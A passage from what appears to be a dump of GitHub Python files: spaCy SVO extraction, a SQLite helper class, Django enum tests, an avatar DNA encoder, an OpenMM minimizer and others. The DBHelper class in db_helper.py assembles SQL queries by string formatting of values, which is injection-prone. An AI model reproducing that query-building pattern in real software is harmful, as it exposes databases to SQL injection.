get_objects_of_verb(verb):\n \"\"\"\n Return all objects of a verb according to the dependency parse,\n including open clausal complements.\n \"\"\"\n objs = [tok for tok in verb.rights if tok.dep_ in OBJ_DEPS]\n # get open clausal complements (xcomp)\n objs.extend(tok for tok in verb.rights if tok.dep_ == \"xcomp\")\n # get additional conjunct objects\n objs.extend(tok for obj in objs for tok in _get_conjuncts(obj))\n return objs\n\n\ndef _get_conjuncts(tok):\n \"\"\"\n Return conjunct dependents of the leftmost conjunct in a coordinated phrase,\n e.g. \"Burton, [Dan], and [Josh] ...\".\n \"\"\"\n return [right for right in tok.rights if right.dep_ == \"conj\"]\n\n\ndef get_span_for_compound_noun(noun):\n \"\"\"\n Return document indexes spanning all (adjacent) tokens\n in a compound noun.\n \"\"\"\n min_i = noun.i - sum(\n 1\n for _ in itertools.takewhile(\n lambda x: x.dep_ == \"compound\", reversed(list(noun.lefts))\n )\n )\n return (min_i, noun.i)\n\n\ndef get_span_for_verb_auxiliaries(verb):\n \"\"\"\n Return document indexes spanning all (adjacent) tokens\n around a verb that are auxiliary verbs or negations.\n \"\"\"\n min_i = verb.i - sum(\n 1\n for _ in itertools.takewhile(\n lambda x: x.dep_ in AUX_DEPS, reversed(list(verb.lefts))\n )\n )\n max_i = verb.i + sum(\n 1\n for _ in itertools.takewhile(\n lambda x: x.dep_ in AUX_DEPS, verb.rights\n )\n )\n return (min_i, max_i)\n\n\ndef subject_verb_object_triples(doc):\n \"\"\"\n Extract an ordered sequence of subject-verb-object (SVO) triples from a\n spacy-parsed doc. Note that this only works for SVO languages.\n\n Args:\n doc (:class:`spacy.tokens.Doc` or :class:`spacy.tokens.Span`)\n\n Yields:\n Tuple[:class:`spacy.tokens.Span`]: The next 3-tuple of spans from ``doc``\n representing a (subject, verb, object) triple, in order of appearance.\n \"\"\"\n # TODO: What to do about questions, where it may be VSO instead of SVO?\n # TODO: What about non-adjacent verb negations?\n # TODO: What about object (noun) negations?\n if isinstance(doc, Span):\n sents = [doc]\n else: # spacy.Doc\n sents = doc.sents\n\n for sent in sents:\n start_i = sent[0].i\n\n verbs = get_main_verbs_of_sent(sent)\n for verb in verbs:\n subjs = get_subjects_of_verb(verb)\n if not subjs:\n continue\n objs = get_objects_of_verb(verb)\n if not objs:\n continue\n\n # add adjacent auxiliaries to verbs, for context\n # and add compounds to compound nouns\n verb_span = get_span_for_verb_auxiliaries(verb)\n verb = sent[verb_span[0] - start_i : verb_span[1] - start_i + 1]\n for subj in subjs:\n subj = sent[\n get_span_for_compound_noun(subj)[0]\n - start_i : subj.i\n - start_i\n + 1\n ]\n for obj in objs:\n if obj.pos == NOUN:\n span = get_span_for_compound_noun(obj)\n elif obj.pos == VERB:\n span = get_span_for_verb_auxiliaries(obj)\n else:\n span = (obj.i, obj.i)\n obj = sent[span[0] - start_i : span[1] - start_i + 1]\n\n yield (subj.text, verb.text, obj.text)","repo_name":"phueb/AOCHILDESComplexity","sub_path":"aochildescomplexity/svo.py","file_name":"svo.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28630744286","text":"data = [0] * 257\n\ndef perms(x):\n if 1 <= x <= 97:\n return x + 159\n if 98 <= x <= 131:\n return x + 28\n if 132 <= x <= 256:\n return x - 131\n \n\ncounter = 0\nprint(\"$$1 \", end=\"\")\na, b = 1, perms(1)\nwhile b != 1:\n print(\"\\\\xrightarrow{\" + str(counter) + \"}\", b, end=\" \")\n a, b = b, perms(b)\n counter += 1\nprint(\"$$\", counter)\n \n\n","repo_name":"artoftheblue/hse-homeworks","sub_path":"linear algebra/idz3.py","file_name":"idz3.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8520984761","text":"import logging\nimport copy\n\nclass DBHelper(object):\n\n def __init__(self, context, table_name, structure):\n self.context = context\n self.table_name = table_name\n self.structure = structure\n\n @staticmethod\n def safe_float(txt):\n try:\n return float(txt)\n except:\n return -1\n\n @staticmethod\n def safe_int(txt):\n try:\n return int(float(txt))\n except:\n return -1\n\n def get_empty_row(self):\n return copy.deepcopy(self.structure)\n\n @staticmethod\n def format_value(value, type):\n if type == 'TEXT' or type == 'BLOB':\n return '\"{}\"'.format(value)\n else:\n return value\n\n @staticmethod\n def gen_select(select_struct):\n select_sql = '*'\n for colname, col in select_struct.items():\n if DBHelper.is_entered(col):\n if select_sql == '*':\n select_sql = '{} '.format(colname)\n else:\n select_sql = '{}, {}'.format(select_sql, colname)\n return select_sql\n\n @staticmethod\n def is_entered(col):\n if type(col['value']) == str:\n if len(col['value']) > 0:\n return True\n else:\n if col['value'] > -1:\n return True\n return False\n\n @staticmethod\n def gen_where(where_struct):\n where_sql = None\n for colname, col in where_struct.items():\n if DBHelper.is_entered(col):\n if where_sql:\n where_sql = '{} AND {} = {} '.format(where_sql, colname,\n DBHelper.format_value(col['value'], col['type']))\n else:\n where_sql = '{} = {}'.format(colname, DBHelper.format_value(col['value'], col['type']))\n return where_sql\n\n @staticmethod\n def gen_set(where_struct):\n set_sql = None\n for colname, col in where_struct.items():\n if DBHelper.is_entered(col):\n if set_sql:\n set_sql = '{}, {} = {} '.format(set_sql, colname,\n DBHelper.format_value(col['value'], col['type']))\n else:\n set_sql = '{} = {}'.format(colname, DBHelper.format_value(col['value'], col['type']))\n return set_sql\n\n @staticmethod\n def gen_col_list(fields):\n col_sql = None\n for colname, col in fields.items():\n if DBHelper.is_entered(col):\n if col_sql:\n col_sql = '{}, {}'.format(col_sql, colname)\n else:\n col_sql = '{}'.format(colname)\n return col_sql\n\n @staticmethod\n def gen_value_list(fields):\n col_sql = None\n for colname, col in fields.items():\n if DBHelper.is_entered(col):\n if col_sql:\n col_sql = '{}, {}'.format(col_sql, DBHelper.format_value(col['value'], col['type']))\n else:\n col_sql = '{}'.format(DBHelper.format_value(col['value'], col['type']))\n return col_sql\n\n def select(self, where_dict, select_dict={}):\n full_sql = 'SELECT {} FROM {} WHERE {};'.format(DBHelper.gen_select(select_dict),\n self.table_name,\n DBHelper.gen_where(where_dict))\n return self.context.query(full_sql)\n\n def sql(self, sql):\n return self.context.query(sql)\n\n def update_insert(self, key, update):\n existing = self.context.query('SELECT * FROM {} WHERE {};'.format(self.table_name, DBHelper.gen_where(key)))\n if len(existing) > 0:\n self.update(key, update)\n else:\n if len(key['id']['value']) < 1:\n new_key = None\n for colname, col in key.items():\n if len(col['value']) > 0:\n if new_key:\n new_key = \"{}-{}\".format(new_key, col['value'])\n else:\n new_key = \"{}\".format(col['value'])\n key['id']['value'] = new_key\n all_fields = copy.deepcopy(key) # start with x's keys and values\n for colname, col in all_fields.items():\n if len(\"{}\".format(update[colname]['value'])) > 0:\n all_fields[colname]['value'] = update[colname]['value']\n insert_sql = 'INSERT INTO {}({}) VALUES({});'.format(self.table_name,\n DBHelper.gen_col_list(all_fields),\n DBHelper.gen_value_list(all_fields))\n self.context.query(insert_sql)\n\n def update(self, key, update):\n update_sql = 'UPDATE {} SET {} WHERE {}'.format(self.table_name,\n DBHelper.gen_set(update),\n DBHelper.gen_where(key))\n self.context.query(update_sql)\n\n def get_by_id(self, id):\n row_match = self.get_empty_row()\n row_match['id']['value'] = id\n results = self.select(row_match)\n if len(results) > 0:\n rv = {}\n cnt = 0\n for colname, col in self.structure.items():\n rv[colname] = results[0][cnt]\n cnt = cnt + 1\n return rv\n else:\n return None\n\n def get_by_name(self, name):\n row_match = self.get_empty_row()\n row_match['name']['value'] = name\n results = self.select(row_match)\n\n if len(results) > 0:\n rv = {}\n cnt = 0\n for colname, col in self.structure.items():\n rv[colname] = results[0][cnt]\n cnt = cnt + 1\n return rv\n else:\n return None\n\n def dict_from_itter(self, itter):\n result = {}\n cnt = 0\n for colname, col in self.structure.items():\n result[colname] = itter[cnt]\n cnt = cnt + 1\n return result\n\n\n def get_all(self):\n db_results = self.sql('select * from {};'.format(self.table_name))\n results = []\n for db_result in db_results:\n results.append(self.dict_from_itter(db_result))\n return results\n","repo_name":"healthyit/brickv2","sub_path":"entities/db_helper.py","file_name":"db_helper.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27985200686","text":"from django.db import connection\n\nimport pytest\n\nfrom .enums import Color, IntegerEnum, LabeledEnum, Taste, ZeroEnum\nfrom .models import MyModel\n\n\n@pytest.mark.django_db\ndef test_field_value():\n m = MyModel(color=Color.RED)\n m.save()\n assert m.color == Color.RED\n\n m = MyModel.objects.filter(color=Color.RED)[0]\n assert m.color == Color.RED\n\n # Passing the value should work the same way as passing the enum\n assert Color.RED.value == 'r'\n m = MyModel.objects.filter(color='r')[0]\n assert m.color == Color.RED\n\n with pytest.raises(ValueError):\n MyModel.objects.filter(color='xx')[0]\n\n\ndef test_descriptor():\n assert MyModel.color.field.enum is Color\n\n\n@pytest.mark.django_db\ndef test_db_value():\n m = MyModel(color=Color.RED)\n m.save()\n cursor = connection.cursor()\n cursor.execute('SELECT color FROM %s WHERE id = %%s' % MyModel._meta.db_table, [m.pk])\n assert cursor.fetchone()[0] == Color.RED.value\n\n\n@pytest.mark.django_db\ndef test_enum_int_field_validators():\n if not hasattr(connection.ops, 'integer_field_range'):\n return pytest.skip('Needs connection.ops.integer_field_range')\n\n # Make sure that integer_field_range returns a range.\n # This is needed to make SQLite emulate a \"real\" db\n orig_method = connection.ops.integer_field_range\n connection.ops.integer_field_range = (lambda *args: (-100, 100))\n\n m = MyModel(color=Color.RED)\n\n # Uncache validators property of taste_int\n for f in m._meta.fields:\n if f.name == 'taste_int':\n if 'validators' in f.__dict__:\n del f.__dict__['validators']\n\n # Run the validators\n m.full_clean()\n\n # Revert integer_field_range method\n connection.ops.integer_field_range = orig_method\n\n\n@pytest.mark.django_db\ndef test_zero_enum_loads():\n # Verifies that we can save and load enums with the value of 0 (zero).\n m = MyModel(zero=ZeroEnum.ZERO, color=Color.GREEN)\n m.save()\n assert m.zero == ZeroEnum.ZERO\n assert m.zero2 == ZeroEnum.ZERO\n\n m = MyModel.objects.get(id=m.id)\n assert m.zero == ZeroEnum.ZERO\n assert m.zero2 == ZeroEnum.ZERO\n\n\n@pytest.mark.django_db\ndef test_int_enum():\n m = MyModel(int_enum=IntegerEnum.A, color=Color.RED)\n m.save()\n\n m = MyModel.objects.get(id=m.id)\n assert m.int_enum == IntegerEnum.A\n assert isinstance(m.int_enum, IntegerEnum)\n\n\ndef test_serialization():\n from django.core.serializers.python import Serializer as PythonSerializer\n m = MyModel(color=Color.RED, taste=Taste.SALTY)\n ser = PythonSerializer()\n ser.serialize([m])\n fields = ser.getvalue()[0][\"fields\"]\n assert fields[\"color\"] == m.color.value\n assert fields[\"taste\"] == m.taste.value\n\n\n@pytest.mark.django_db\ndef test_nonunique_label():\n obj = MyModel.objects.create(\n color=Color.BLUE,\n labeled_enum=LabeledEnum.FOOBAR\n )\n assert obj.labeled_enum is LabeledEnum.FOOBAR\n\n obj = MyModel.objects.get(pk=obj.pk)\n assert obj.labeled_enum is LabeledEnum.FOOBAR\n","repo_name":"hzdg/django-enumfields","sub_path":"tests/test_django_models.py","file_name":"test_django_models.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"37"} +{"seq_id":"14605891289","text":"\"\"\"Avatar utilities and generic definitions\r\n\r\nThis module defines base classes for representing avatar body parts and defines\r\nthe properties and behavior of avatars and body parts\r\n\"\"\"\r\n\r\nfrom enum import Enum\r\nfrom math import log2, ceil\r\nfrom abc import abstractmethod, ABC\r\nfrom functools import reduce\r\nfrom random import randint, choice\r\nfrom utils.colors import COLOR_NAMES\r\n\r\n\"\"\" Enum for encoding the base units of DNA \"\"\"\r\nDNANucleotide = Enum('DNANucleotide', 'C G A T', start=0)\r\n\r\n# number of bits a number in [0, x) takes to represent\r\ndef _bit_length(x): return int(ceil(log2(x)))\r\n\r\n\r\nclass BodyPart(ABC):\r\n \"\"\"Abstract base class for body parts\r\n \r\n This is an abstract class, do not instansiate it.\r\n\r\n \r\n Attributes:\r\n variation (int, optional): the shape variation of the body part.\r\n Optional only if the VARIATIONS parameter is 1 (a single variation is possible)\r\n color (str, optional): the color name of the part. Should be supplied if and\r\n only if the IS_COLORABLE parameter is True.\r\n \"\"\"\r\n COLOR_BIT_LEN = 6 # length in bits a color selection\r\n\r\n @property\r\n @abstractmethod\r\n def VARIATIONS():\r\n \"\"\"how many different structure types can a body part have\"\"\"\r\n pass\r\n\r\n @property\r\n @abstractmethod\r\n def IS_COLORABLE():\r\n \"\"\"is the body part color-dependent and can be colored\"\"\"\r\n pass\r\n\r\n @classmethod\r\n def bit_len(cls):\r\n \"\"\"The size a body part takes up in bits\r\n\r\n Returns:\r\n int: amount of bits a bitstring representation of this part takes\r\n \"\"\"\r\n cls_len = _bit_length(cls.VARIATIONS)\r\n if cls.IS_COLORABLE:\r\n cls_len += cls.COLOR_BIT_LEN\r\n return cls_len\r\n\r\n def __init__(self, variation=None, color=None):\r\n if variation is None:\r\n assert self.VARIATIONS == 1, \\\r\n \"variation must be specified if and only if the body part has more than 1 variations\"\r\n variation = 0\r\n assert (0 <= variation < self.VARIATIONS), \\\r\n f\"variation must be between 0 (inclusive) and {self.VARIATIONS} (exclusive)\"\r\n assert (color is None) == (not self.IS_COLORABLE), \\\r\n \"color must be specified if and only if the body part is colorable\"\r\n self.variation = variation\r\n self.color = color\r\n \r\n def __repr__(self):\r\n part_name = self.__class__.__name__\r\n if self.IS_COLORABLE:\r\n return f\"{part_name}(variation={self.variation!r}, color={COLOR_NAMES.index(self.color)!r})\"\r\n return f\"{part_name}(variation={self.variation!r})\"\r\n\r\n def _encode_variation(self):\r\n if self.VARIATIONS == 1:\r\n return \"\"\r\n return f\"{self.variation:0b}\".zfill(_bit_length(self.VARIATIONS))\r\n\r\n @classmethod\r\n def _decode_variation(cls, decode_string):\r\n if len(decode_string) == 0:\r\n return None\r\n return int(decode_string, 2)\r\n\r\n def _encode_color(self):\r\n if not self.IS_COLORABLE:\r\n return \"\"\r\n color_index = COLOR_NAMES.index(self.color)\r\n return f\"{color_index:0b}\".zfill(self.COLOR_BIT_LEN)\r\n\r\n @staticmethod\r\n def _decode_color(decode_string):\r\n if len(decode_string) == 0:\r\n return None\r\n\r\n decoded_int = int(decode_string, 2)\r\n return COLOR_NAMES[decoded_int]\r\n\r\n def to_bitstring(self):\r\n \"\"\"Encodes the body part to bits\r\n\r\n Returns:\r\n str: a bit string encoding of the body part\r\n \"\"\"\r\n return self._encode_variation() + self._encode_color()\r\n\r\n @classmethod\r\n def from_bitstring(cls, decode_string):\r\n \"\"\"Creates the body part represented by the bitstring\r\n\r\n Args:\r\n decode_string (str): bitstring which matches to the to_bitstring method.\r\n\r\n Returns:\r\n BodyPart: an instance of the class (extends BodyPart) which is encoded in the bitstring.\r\n \"\"\"\r\n assert cls.bit_len() == len(decode_string), \"String decode length mismatch\"\r\n\r\n # if required decode color\r\n if cls.IS_COLORABLE:\r\n color = cls._decode_color(decode_string[-cls.COLOR_BIT_LEN:])\r\n decode_string = decode_string[:-cls.COLOR_BIT_LEN]\r\n else:\r\n color = None\r\n\r\n # decode variation\r\n variation = cls._decode_variation(decode_string)\r\n\r\n return cls(variation, color)\r\n\r\n @classmethod\r\n def randomize(cls):\r\n \"\"\"Randomly generate a body part\r\n\r\n Returns:\r\n BodyPart: A randomized body part of the matching class.\r\n \"\"\"\r\n # if required generate color\r\n if cls.IS_COLORABLE:\r\n color = choice(COLOR_NAMES)\r\n else:\r\n color = None\r\n\r\n # if required generate variation\r\n if cls.VARIATIONS > 1:\r\n variation = randint(0, cls.VARIATIONS - 1)\r\n else:\r\n variation = None\r\n\r\n return cls(variation=variation, color=color)\r\n\r\n\r\nclass AvatarBase(ABC):\r\n \"\"\"Base class for user avatars\r\n \r\n This is an abstract class, do not instansiate it.\r\n Do not add several body parts of the same name to the same avatar subclass,\r\n including repeated names up to letter case (for example, 'Face' and 'FACE' are prohibited too).\r\n \r\n Attributes:\r\n body_parts (list of BodyPart): list of the avatar's body parts.\r\n parts should be ordered by the order of the BodyPart initialization\r\n in the avatar class. \r\n \"\"\"\r\n _BODY_PART_TYPES = []\r\n __PART_NAME_TO_INDEX = {}\r\n BITS_IN_NUCLEOTIDE = 2\r\n\r\n def __new__(cls, *args, **kwargs):\r\n \"\"\"\r\n Overriding __new__ to disallow instanciating AvatarBase, \r\n despite not having abstract methods.\r\n \"\"\"\r\n if cls is AvatarBase:\r\n raise TypeError(\"Can't instantiate abstract class Avatar base\")\r\n return super(AvatarBase, cls).__new__(cls)\r\n\r\n def __init__(self, *body_parts):\r\n self.body_parts = []\r\n for part, cls in zip(body_parts, self._BODY_PART_TYPES):\r\n assert isinstance(\r\n part, cls), f\"Given body parts mismatch the required types\"\r\n self.body_parts.append(part)\r\n\r\n @classmethod\r\n def bit_len(cls):\r\n \"\"\"The size of a bit encoding of the avatar\r\n\r\n Returns:\r\n int: the number of bits in a bit representation of an avatar\r\n \"\"\"\r\n return sum([p.bit_len() for p in cls._BODY_PART_TYPES])\r\n\r\n def __getitem__(self, part):\r\n \"\"\"returns an avatar's body part\r\n\r\n Args:\r\n part (str): the name of the body part fetched\r\n\r\n Raises:\r\n KeyError: Bad part name or part name doesn't exist in the avatar.\r\n\r\n Returns:\r\n BodyPart: the avatar's body part with the given body part name\r\n \"\"\"\r\n if not isinstance(part, str):\r\n raise KeyError(\"Get expects a string part name\")\r\n \r\n key = part.lower()\r\n if key not in self.__PART_NAME_TO_INDEX:\r\n raise KeyError(f\"{self.__class__.__qualname__} has not body part {key}\")\r\n \r\n index = self.__PART_NAME_TO_INDEX[key]\r\n if index >= len(self.body_parts):\r\n raise KeyError(f\"Missing body part of type \\'{key}\\'. \" +\r\n \"This instance was probably created before the part was registered.\")\r\n \r\n return self.body_parts[index]\r\n\r\n def to_bitstring(self):\r\n \"\"\"Encodes the avatar into a bitstring\r\n\r\n Returns:\r\n str: bitstring which represents the avatar\r\n \"\"\"\r\n return ''.join([part.to_bitstring() for part in self.body_parts])\r\n\r\n @classmethod\r\n def from_bitstring(cls, decode_string):\r\n \"\"\"Creates an avatar from it's describing bitstring\r\n\r\n Args:\r\n decode_string (str): a bitstring which matches the\r\n to_bitstring format of the avatar.\r\n\r\n Returns:\r\n AvatarBase: an instance of this avatar subclass whose features match\r\n the supplied bitstring.\r\n \"\"\"\r\n assert len(decode_string) == cls.bit_len(), \"Bad decode string length\"\r\n\r\n lengths = [p.bit_len() for p in cls._BODY_PART_TYPES]\r\n indices = reduce(lambda lst, length: lst +\r\n [lst[-1] + length], lengths[:-1], [0])\r\n part_strings = [decode_string[i:i + length]\r\n for i, length in zip(indices, lengths)]\r\n parts = [p_type.from_bitstring(s) for s, p_type in zip(\r\n part_strings, cls._BODY_PART_TYPES)]\r\n return cls(*parts)\r\n\r\n def to_dna(self):\r\n \"\"\"Encodes the avatar to a DNA sequence.\r\n \r\n A DNA sequence her means a string whose characters are DNANucleotides.\r\n\r\n Returns:\r\n str: A DNA sequence which represents the bitstring encoding of the avatar\r\n \"\"\"\r\n chunk_size = self.BITS_IN_NUCLEOTIDE\r\n bitstring = self.to_bitstring()\r\n pad = (-len(bitstring) % chunk_size) * '0'\r\n bitstring = pad + bitstring\r\n chunks = [bitstring[i: i + chunk_size] for i in range(0, len(bitstring), chunk_size)]\r\n dna_list = [DNANucleotide(int(chunk, 2)) for chunk in chunks]\r\n return ''.join([nucleotide.name for nucleotide in dna_list])\r\n \r\n @classmethod\r\n def from_dna(cls, dna_string):\r\n \"\"\"Creates an avatar described by the given DNA sequence\r\n \r\n A DNA sequence her means a string whose characters are DNANucleotides.\r\n\r\n Args:\r\n dna_string (str): a DNA sequence which matches the avatar's format.\r\n\r\n Raises:\r\n ValueError: The DNA string given is faulty/doesn't match the format.\r\n\r\n Returns:\r\n AvatarBase: an instance of this avatar subclass whose features match\r\n the supplied DNA.\r\n \"\"\"\r\n chunk_size = cls.BITS_IN_NUCLEOTIDE\r\n\r\n allowed_chars = [e.name for e in DNANucleotide]\r\n\r\n if any([(c not in allowed_chars) for c in dna_string]):\r\n raise ValueError(\"Invalid DNA string.\")\r\n \r\n dna_numbers = [DNANucleotide[ch].value for ch in dna_string]\r\n bitstring = ''.join([f\"{num:0b}\".zfill(chunk_size) for num in dna_numbers])\r\n needed_len = cls.bit_len()\r\n if not (0 <= len(bitstring) - needed_len < chunk_size):\r\n raise ValueError(\"Bad DNA string length\")\r\n pad, bitstring = bitstring[:-needed_len], bitstring[-needed_len:]\r\n if '1' in pad:\r\n raise ValueError(\"Bad DNA string length\")\r\n return cls.from_bitstring(bitstring)\r\n\r\n @classmethod\r\n def randomize(cls):\r\n \"\"\"Randomly generate an avatar\r\n\r\n Returns:\r\n AvatarBase: creates an avatar which has all of it's body parts randomized.\r\n \"\"\"\r\n return cls(*(p.randomize() for p in cls._BODY_PART_TYPES))\r\n \r\n @staticmethod\r\n def _part_to_name(part):\r\n return part.__name__.lower()\r\n \r\n @classmethod\r\n def register_part(cls, part):\r\n \"\"\"Decorator. Registers a body part to the avatar class.\r\n\r\n Registration should occur before any avatar instances are created!\r\n\r\n Args:\r\n part ([type]): [description]\r\n\r\n Raises:\r\n TypeError: Attempted to register a part to the AvatarBase\r\n KeyError: The body part's name is already used by some other part.\r\n \"\"\"\r\n if cls is AvatarBase:\r\n raise TypeError(\"Can't register body parts to AvatarBase\")\r\n\r\n part_name = cls._part_to_name(part)\r\n if part_name in cls.__PART_NAME_TO_INDEX:\r\n raise KeyError(f\"Body part name {part_name} is already taken in {cls.__qualname__}\")\r\n \r\n index = len(cls._BODY_PART_TYPES)\r\n cls._BODY_PART_TYPES.append(part)\r\n cls.__PART_NAME_TO_INDEX[part_name] = index\r\n\r\n return part\r\n\r\n","repo_name":"CiniMinis/workshop-project","sub_path":"server/app/modules/avatar.py","file_name":"avatar.py","file_ext":"py","file_size_in_byte":12009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20325753864","text":"import pandas as pd\nfrom collections import defaultdict\nfrom sqlalchemy.inspection import inspect\nfrom databaseModel import *\n\n\ndef query_to_dict(rset):\n result = defaultdict(list)\n for obj in rset:\n instance = inspect(obj)\n for key, x in instance.attrs.items():\n result[key].append(x.value)\n return result\n\ndef checkEventType(event1, event2):\n try:\n # db.session = db.session(engine)\n # EventType = Base.classes.event_type\n temp = pd.DataFrame(query_to_dict(db.session.query(EventType).all()))\n if not temp.empty:\n maxId = max(temp['id'])\n else:\n maxId = 0\n\n if maxId:\n if temp.loc[temp['name'] == event1].empty:\n db.session.add(EventType(name=event1))\n if temp.loc[temp['name'] == event2].empty:\n db.session.add(EventType(name=event2))\n else:\n db.session.add(EventType(name=event1))\n db.session.add(EventType(name=event2))\n db.session.commit()\n db.session.close()\n except:\n return 'DATABASE ERROR: Something wrong with event_type table!'\n\ndef writeEventLog(gwNumber, eventType):\n if type(gwNumber) == int:\n gwNumber = '%014i' %gwNumber\n\n # Gateway = Base.classes.gateway\n # EventType = Base.classes.event_type\n # GatewayLog = Base.classes.gateway_log\n # db.session = db.session(engine)\n try:\n gwId = db.session.query(Device).filter(Device.serial_number == gwNumber).first().id\n except:\n db.session.close()\n return'DATABASE ERROR: GW number is wrong!'\n\n try:\n etId = db.session.query(EventType).filter(EventType.name == eventType).first().id\n except:\n db.session.close()\n return 'DATABASE ERROR: Event type is wrong!'\n # db.session.add(DeviceLog(event_type_id=etId, gateway_id=gwId))\n db.session.commit()\n db.session.close()\n","repo_name":"h4m3d92/AFE_IOT_Server","sub_path":"pgDatabase.py","file_name":"pgDatabase.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6000244881","text":"from scipy import optimize\nfrom openmm.app.pdbfile import PDBFile\nfrom openmm.unit import *\nimport numpy as np\n\nfrom EnergyReporter import EnergyReporter\nfrom molFileReader import molFileReader\n\n# pylint: disable=no-member\nimport openmm\npicoseconds = openmm.unit.picoseconds\npicosecond = picoseconds\nnanometer = openmm.unit.nanometer\nfemtoseconds = openmm.unit.femtoseconds\n# pylint: enable=no-member\n\nconstr_2_idx = {\n 'X': [0], 'Y': [1], 'Z': [2],\n 'XY': [0, 1], 'XZ': [1,2], 'YZ': [1,2],\n 'YX': [0, 1], 'ZX': [1,2], 'ZY': [1,2],\n 'XYZ': [0, 1, 2]\n}\n\n\n\nclass BFGS(object):\n def __init__(self, context, constraints=None, out_pdb=None, topology=None):\n self._out_file = None\n self._topology = topology\n self._step_num = 0\n self._constraints = constraints\n self._context = context\n if out_pdb is not None and topology is not None:\n self._out_file = open(out_pdb, 'w')\n\n\n def _callback(self, pos):\n if self._out_file is not None:\n PDBFile.writeModel(self._topology, pos.reshape(-1,3)*nanometer, file=self._out_file, modelIndex=self._step_num)\n self._step_num += 1\n\n\n def minimize(self):\n #constraints = dict(zip(np.arange(64), ['Z']*64))\n\n init_state = self._context.getState(getForces=True, getEnergy=True, getPositions=True)\n init_pos = init_state.getPositions(True).value_in_unit(nanometer)\n init_energy, init_forces = self._target_func(init_pos, self._context, self._constraints)\n force_norms = [np.linalg.norm(f) for f in init_forces]\n print(\" Initial max. force: {:15.3f} kJ/mol\".format(np.max(force_norms)))\n print(\" Initial energy: {:15.3f} kJ/mol/nm\".format(init_energy))\n\n\n self._step_num = 0\n args = (self._context, self._constraints)\n self._callback(init_pos)\n res = optimize.minimize(self._target_func, init_pos, args=args, method='L-BFGS-B', jac=True, callback=self._callback,\n options=dict(maxiter=500, disp=False, gtol=5))\n final_pos = res.x.reshape(-1,3)\n\n final_energy, final_forces = self._target_func(final_pos, self._context, self._constraints)\n force_norms = [np.linalg.norm(f) for f in final_forces]\n print(\" Final max. force: {:15.3f} kJ/mol\".format(np.max(force_norms)))\n print(\" Final energy: {:15.3f} kJ/mol/nm\".format(final_energy))\n\n\n def _target_func(self, pos, context, constraints=None):\n context.setPositions(pos.reshape(-1,3))\n state = context.getState(getEnergy=True, getForces=True)\n forces = state.getForces(asNumpy=True)\n energy = state.getPotentialEnergy().value_in_unit(kilojoule_per_mole)\n forces = forces.value_in_unit(kilojoule_per_mole/nanometer)\n\n if constraints is not None:\n for n, constr in constraints.items():\n for idx in constr_2_idx[constr.upper()]:\n forces[n][idx] *= 0\n\n return energy, -forces.flatten()\n\n","repo_name":"ChristopherAMyers/OpenMMEnergies","sub_path":"minimize.py","file_name":"minimize.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"11113413023","text":"import unittest\nimport os\n\nfrom sgeproxy.publisher import RecordsByName, StreamsFiles\nfrom quoalise.data import Data, Metadata\nfrom slixmpp.xmlstream import ET\n\nTEST_DATA_DIR = os.path.join(os.path.dirname(__file__), \"test_data\", \"streams\")\n\n\nclass Args:\n aes_iv = None\n aes_key = None\n\n\ndef day_records():\n streams_files = StreamsFiles(\n inbox_dir=None,\n archive_dir=os.path.join(TEST_DATA_DIR, \"archive\", \"2023-01-15\"),\n errors_dir=None,\n aes_iv=Args.aes_iv,\n aes_key=Args.aes_key,\n publish_archives=True,\n )\n records_by_name = RecordsByName()\n for f in streams_files.glob():\n for metadata, record in streams_files.file_records(f):\n records_by_name.add(metadata, record)\n return records_by_name\n\n\nclass TestStreams(unittest.TestCase):\n def test_day_all(self):\n\n records_by_name = day_records()\n for metadata, records in records_by_name.get():\n print(metadata.to_dict())\n for record in records:\n self.assertEqual(record.unit, metadata.measurement.unit.value)\n self.assertTrue(\n record.name.startswith(\n f\"urn:dev:prm:{metadata.device.identifier.value}\"\n )\n )\n\n def test_day_prefix(self):\n\n NAME = \"urn:dev:prm:30001444954220_consumption/power/inductive/raw\"\n\n records_by_name = day_records()\n\n for _, records in records_by_name.get(NAME):\n for record in records:\n self.assertEqual(NAME, record.name)\n\n def test_day_chunk(self):\n\n NAME = \"urn:dev:prm:30001444954220_consumption/power/inductive/raw\"\n CHUNK_SIZE = 10\n\n all_records_chunks = []\n\n records_by_name = day_records()\n\n for metadata, records in records_by_name.get(NAME):\n all_records = records\n all_records_meta = metadata\n\n for metadata, records in records_by_name.get(NAME, chunk_size=CHUNK_SIZE):\n self.assertEqual(metadata, all_records_meta)\n self.assertTrue(len(records) <= CHUNK_SIZE)\n all_records_chunks.extend(records)\n\n self.assertEqual(all_records, all_records_chunks)\n\n def test_day_to_xml(self):\n\n records_by_name = day_records()\n for metadata, records in records_by_name.get():\n data = Data(metadata=Metadata(metadata.to_dict()), records=records)\n as_xml = data.to_xml()\n as_xml = ET.tostring(as_xml, encoding=\"utf8\", method=\"xml\")\n print(as_xml.decode(\"utf-8\"))\n\n def test_get_records_grouped_by_metadata(self):\n\n NAME = \"urn:dev:prm:30001444954220_consumption/energy/active/index\"\n # This series name will match with records named\n #\n # …_consumption/energy/active/index\n # …_consumption/energy/active/index/distributor/hph\n # …_consumption/energy/active/index/distributor/hch\n # …\n #\n # We them all at once, as they share the same metadata\n\n records_by_name = day_records()\n records_by_meta = list(records_by_name.get(NAME))\n self.assertTrue(len(records_by_meta) == 1)\n self.assertTrue(len(records_by_meta[0][1]) > 0)\n\n\nif __name__ == \"__main__\":\n\n import sys\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"aes_iv\",\n help=\"iv used to decrypt stream files\",\n )\n parser.add_argument(\n \"aes_key\",\n help=\"key used to decrypt stream files\",\n )\n args, unittest_args = 